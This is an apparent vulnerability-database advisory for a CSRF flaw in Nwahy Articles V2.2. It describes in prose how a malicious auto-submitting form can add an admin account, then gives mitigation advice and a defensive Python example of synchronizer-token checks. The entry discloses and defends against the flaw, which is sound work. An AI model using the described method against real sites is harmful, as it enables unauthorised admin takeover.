Vendor: Articles
By: DaOne
CVSS: 8.8 (HIGH)
CWE: 352, Cross-Site Request Forgery (CSRF)
Product Name: Articles
Affected Version From: V2.2
Affected Version To: V2.2
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2012
Nwahy Articles V2.2 CSRF Add Admin
This exploit allows an attacker to add an admin user to the Nwahy Articles V2.2 web application. The attacker crafts a malicious HTML page containing a form whose hidden fields hold the username, password, email, site, name, and group type of the new admin user. When the victim visits the malicious page, the form is submitted automatically and the admin user is added to the application.
Mitigation:
Implement CSRF protection mechanisms such as synchronizer tokens, or use a web application firewall to detect and block malicious requests.
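
The synchronizer-token mitigation applied to an add-admin handler, as an added example that is not code from Nwahy Articles or from the original advisory. The `Session` class, the handler, and the form field names are hypothetical, and the sample form values are constructed.

```python
import hmac
import secrets

# Form fields listed in the advisory; the exact parameter names are assumed.
ADMIN_FIELDS = ("username", "password", "email", "site", "name", "group_type")

class Session:
    """Hypothetical server-side session record."""
    def __init__(self, user, is_admin):
        self.user = user
        self.is_admin = is_admin
        # Unpredictable per-session token, stored server-side only.
        self.csrf_token = secrets.token_urlsafe(32)

def render_add_admin_form(session):
    """Hidden field the server embeds in the genuine add-admin form."""
    return {"csrf_token": session.csrf_token}

def handle_add_admin(session, form, admins):
    """State-changing handler; returns (status, message)."""
    if session is None or not session.is_admin:
        return 403, "not authorised"
    submitted = form.get("csrf_token", "")
    # Constant-time comparison; a missing or wrong token is rejected
    # before any field of the request is acted on.
    if not hmac.compare_digest(submitted.encode(), session.csrf_token.encode()):
        return 403, "CSRF token missing or invalid"
    missing = [f for f in ADMIN_FIELDS if not form.get(f)]
    if missing:
        return 400, "missing fields: " + ", ".join(missing)
    admins.append(form["username"])
    return 200, "admin added"

def demo():
    admins = []
    session = Session("site-admin", is_admin=True)
    # Constructed sample values for the new account.
    new_admin = {"username": "newadmin", "password": "example-only",
                 "email": "new@example.test", "site": "example.test",
                 "name": "New Admin", "group_type": "admin"}
    # A cross-site page rides the victim's session but cannot read the token.
    forged = dict(new_admin)
    guessed = dict(new_admin, csrf_token="A" * 43)
    genuine = dict(new_admin, **render_add_admin_form(session))
    codes = [handle_add_admin(session, f, admins)[0]
             for f in (forged, guessed, genuine)]
    return codes, admins

if __name__ == "__main__":
    print(demo())
```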